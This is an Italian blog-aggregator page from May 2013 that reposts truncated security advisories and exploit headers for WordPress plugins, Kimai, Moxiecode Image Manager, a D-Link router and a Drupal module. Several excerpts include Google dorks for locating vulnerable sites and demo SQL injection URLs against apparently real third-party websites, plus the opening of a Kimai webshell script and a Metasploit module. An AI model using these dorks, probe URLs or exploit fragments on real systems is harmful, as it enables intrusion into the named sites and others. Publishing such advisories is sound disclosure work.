Il Bloggatore

WordPress Spider Catalog Multiple Vulnerabilities

22 maggio 2013 - Fonte: http://www.mondounix.com

Author: Janek Vind "waraxe"
Date: 22. May 2013
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-105.html
 
 
Description of vulnerable software:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
Spider Catalog is the best WordPress catalog plugin. It is a convenient tool
for organizing the products represented on your website into catalogs. Each
product on the catalog is assigned with a relevant category, which makes it
easier for the customers to search and identify the needed products within the
catalog.
 
http://wordpress.org/extend/plugins/catalog/
http://web-dorado.com/products/wordpress-catalog.html
 
Vulnerable is current version 1.4.6, older versions...

Leggi il seguito »

Nessun commento »

Inserito in 0day, cross site scripting, exploit, FULL PATH DISCLOSURE, function, linux, MondoUnix, multiple, PHP, REFLECTED XSS, remote, Security, Sicurezza, SPIDER CATALOG, sql injection, SQL-I, STORED XSS, unix, Vulnerabilities, Vulnerability, webapps, wordpress, WORDPRESS SECURITY, XSS

WordPress Spider Event Calendar Multiple Vulnerabilities

22 maggio 2013 - Fonte: http://www.mondounix.com

Author: Janek Vind "waraxe"
Date: 22. May 2013
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-104.html
 
 
Description of vulnerable software:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
Spider Event Calendar is a highly configurable plugin which allows you
to have multiple organized events in a calendar. This plugin is one of
the best WordPress Calendar available in WordPress Directory. If you
have problem with organizing your WordPress Calendar events and displaying
them in a calendar format, then Spider WordPress Calendar Plugin is the
best solution.
 
http://wordpress.org/extend/plugins/spider-event-calendar/
http://web-dorado.com/products/wordpress-calendar.html
 
Vulnerable...

Leggi il seguito »

Nessun commento »

Inserito in 0day, cross site scripting, exploit, FULL PATH DISCLOSURE, function, linux, MondoUnix, multiple, PHP, REFLECTED XSS, remote, Security, Sicurezza, SPIDER EVENT CALENDAR, sql injection, SQL-I, STORED XSS, unix, Vulnerabilities, Vulnerability, webapps, wordpress, WORDPRESS SECURITY, XSS

WordPress Flagallery-Skins SQL Injection

22 maggio 2013 - Fonte: http://www.mondounix.com

##############
# Exploit Title : Wordpress Flagallery-skins plugin SQL Injection
#
# Exploit Author : Ashiyane Digital Security Team
#
# Home : www.ashiyane.org
#
# Security Risk : Medium
#
# Dork : inurl:/wp-content/plugins/flagallery-skins/compact_music_player/gallery.php?playlist=
#
# Tested on: Linux
#
##############
#Location:site/wp-content/plugins/flagallery-skins/compact_music_player/gallery.php?playlist=[SQL]
#
#
#DEm0:
# http://www.argomentitessili.com/wp-content/plugins/flagallery-skins/compact_music_player/gallery.php?playlist=my-playlist%27
#
# http://kiwirootsmusic.com/wp-content/plugins/flagallery-skins/compact_music_player/gallery.php?playlist=recordings%27
#
# http://www.buritacaworldbeat.com/wp-content/plugins/flagallery-skins/compact_music_player/gallery.php?playlist=burisongs%27
#
#...

Leggi il seguito »

Nessun commento »

Inserito in 0day, exploit, FLAGALLERY-SKINS, linux, MondoUnix, PHP, remote, Security, Sicurezza, sql injection, SQL-I, unix, Vulnerabilities, Vulnerability, webapps, wordpress, WORDPRESS SECURITY, WP-CONTENT

Kimai 0.9.2.1306-3 SQL Injection

22 maggio 2013 - Fonte: http://www.mondounix.com

# Exploit Title: Kimai 0.9.2.1306-3 SQLi
# Date: 05/20/2013
# Exploit Author: drone (@dronesec)
# Vendor Homepage: http://www.kimai.org/
# Software Link: https://downloads.sourceforge.net/project/kimai/0.9.x/kimai.0.9.2.1306-3.zip 
# Version: 0.9.2.1306-3
# Fixed in: source repositories (https://github.com/kimai/kimai)
# Tested on: Windows XP SP3, Ubuntu 12.04 (apparmor disabled)
 
"""
    This doesn't even require authentication to the
    web app, as the file is accessible to any user.
 
    Modify paths accordingly if running against Windows
 
    @dronesec
"""
from argparse import ArgumentParser
import string
import random
import urllib2
import sys
import re
 
def webshell(options,...

Leggi il seguito »

Nessun commento »

Inserito in 0day, exploit, KIMAI, metasploit, MondoUnix, PHP, remote, Security, Sicurezza, sql injection, SQL-I, unix, Vulnerabilities, Vulnerability, webapps

image2css: Come convertire un’immagine in CSS con PHP

22 maggio 2013 - Fonte: http://codesnippet.biz

image2css: Come convertire un’immagine in CSS con PHP E' un post proveniente da CodeSnippet.biz

Tempo fa abbiamo già visto come creare un PDF utilizzando PHP (qui c’è un altro esempio) o come manipolare le immagini applicando i filtri, qualche giorno fa invece mi sono imbattuto in una simpatica libreria PHP che permette di trasformare un’immagine...

Leggi il seguito »

Nessun commento »

Inserito in codesnippet.biz, convertire immagine in css, css, css3, image2css, PHP, Snippet

Moxiecode Image Manager 3.1.5 Shell Upload

21 maggio 2013 - Fonte: http://www.mondounix.com

I want to warn you about vulnerabilities in Moxiecode Image Manager 
(MCImageManager). This is commercial plugin for TinyMCE. It concerns as 
MCImageManager, as all web applications which have MCImageManager in their 
bundle.
 
These are Arbitrary File Uploading vulnerabilities, which lead to Code 
Execution on IIS and Apache web servers.
 
-------------------------
Affected products:
-------------------------
 
Vulnerable are Moxiecode Image Manager 3.1.5 and previous versions.
 
-------------------------
Affected vendors:
-------------------------
 
Moxiecode
http://www.moxiecode.com
 
----------
Details:
----------
 
Arbitrary File Uploading (WASC-31):
 
http://site/path/tiny_mce/plugins/imagemanager/pages/im/index.html
 
Execution...

Leggi il seguito »

Nessun commento »

Inserito in 0day, exploit, IMAGE MANAGER, linux, MondoUnix, MOXICODE, PHP, poc, proof of concept, remote, Security, SHELL UPLOAD, Sicurezza, unix, Vulnerabilities, Vulnerability, webapps

D-Link DIR615h OS Command Injection

21 maggio 2013 - Fonte: http://www.mondounix.com

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
 
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::HttpServer
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper
 
  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'D-Link DIR615h OS Command Injection',
      'Description' => %q{
          Some D-Link Routers are vulnerable to an authenticated OS command injection...

Leggi il seguito »

Nessun commento »

Inserito in 0day, COMMAND EXECUTION, COMMAND INJECTION, D-link, DIR615H, exploit, firmware, frame, GETCONFIG, metasploit, MondoUnix, PHP, remote, Security, Sicurezza, unix, Vulnerabilities

WordPress ProPlayer Plugin SQL Injection

21 maggio 2013 - Fonte: http://www.mondounix.com

##############
# Exploit Title : WordPress ProPlayer Plugin SQL Injection
#
# Exploit Author : Ashiyane Digital Security Team
#
# Plugin Link  : http://wordpress.org/plugins/proplayer/
#
# Home : www.ashiyane.org
#
# Security Risk : High
#
# Version : 4.7.9.1
#
# Dork : inurl:wp-content/plugins/proplayer/playlist-controller.php?id=
#
# Tested on: Linux
#
##############
#Location:site/wp-content/plugins/proplayer/playlist-controller.php?id=[SQL]
#
#
#DEm0:
# http://www.andrewardizzoia.info/wp-content/plugins/proplayer/playlist-controller.php?id=32-0%27
#
# http://www.straightlinehdd.com/en/fear-no-ground/wp-content/plugins/proplayer/playlist-controller.php?id=151-0%27
#
# http://djmikewallace.com/wp-content/plugins/proplayer/playlist-controller.php?id=42-0%27
#
#...

Leggi il seguito »

Nessun commento »

Inserito in 0day, exploit, linux, MondoUnix, PHP, PROPLAYER, PROPRLAYER PLUGIN, remote, Security, Sicurezza, sql injection, SQL-I, unix, Vulnerabilities, Vulnerability, webapps, wordpress, WORDPRESS SECURITY

[Corso di PHP] Lezione 12 – Creare un login sicuro

18 maggio 2013 - Fonte: http://www.sv-design.org/blog

Salve ragazzi,

come sempre vi presento la nuova lezione del nostro corso di php.

Siamo giunti alla lezione numero 12, e cioé la prima in cui trattiamo un argomento pratico.

Leggi l'intero articolo: [Corso di PHP] Lezione 12 – Creare un login sicuro

Articolo postato da: Stefano Venneri - ...

Leggi il seguito »

Nessun commento »

Inserito in cookie, corso di php, guida programmazione, html, Javascript, login, login sicuro, MySQL, PHP, Php & Mysql, S.V. Design, script-php, sessione, tutorial php

Drupal 6.x/7.x Google Authenticator login Access Bypass

18 maggio 2013 - Fonte: http://www.mondounix.com

 
 
    Advisory ID: DRUPAL-SA-CONTRIB-2013-047
    Project: Google Authenticator login (third-party module)
    Version: 6.x, 7.x
    Date: 2013-May-15
    Security risk: Moderately critical
    Exploitable from: Remote
    Vulnerability: Access bypass
 
Description
 
This module will allow you to add Time-based One-time Password Algorithm (also called "Two Step Authentication" or "Multi-Factor Authentication") support to user logins. It works with Google's Authenticator app system and support most (if not all) OATH based HOTP/TOTP systems.
Accidental removal of account configuration.
 
In certain scenarios, Google Authenticator login incorrectly determines the user's account name. The...

Leggi il seguito »

Nessun commento »

Inserito in 0day, Bypass, CMS, drupal, exploit, Google Authenticator, linux, LOGIN ACCESS BYPASS, MondoUnix, PHP, remote, Security, Sicurezza, unix, Vulnerabilities, Vulnerability, webapps

12 3 4 5 »10 20 30...Ultima »

Sconti e Coupon 100x100 gratuiti
- Iscriviti ai nostri feeds: è gratis! Potrai essere sempre aggiornato su tutte le notizie e le novità provenienti dal mondo informatico! Il tutto IN MODO ASSOLUTAMENTE GRATUITO!!!

Iscriviti gratis alla newsletter

e ricevi una mail al giorno con 20 notizie tratte da
"Il Bloggatore"
Inserisci la tua email:

Ultime Recensioni

I vostri ultimi commenti

The best ChefVille H: Just want to say your article is as amazing. The clearness in your post is simp...
Giuseppe: Salve warts ho una ford ka e avrei bisogno del code il modello e M017567 Grazie ...
Adele: Bon conseil, c'est très instructif pour moi. Merci...
back pain: Having read this I believed it was really informative. I appreciate you taking t...
Sammie: I am really glad to read this blog posts which consists of lots of valuable data...

La classifica:
I blog più attivi

Antipixel e Loghi

<a href="http://www.ilbloggatore.com/" title="Il Bloggatore"><img src="http://images.ilbloggatore.com/ilbloggatore.png" border="0" alt="Il Bloggatore" /></a>

Back to Top

Il presente portale è tutelato dallo Studio Legale Maggesi di Roma - Diritto Internet - Diritto Civile - Diritto Societario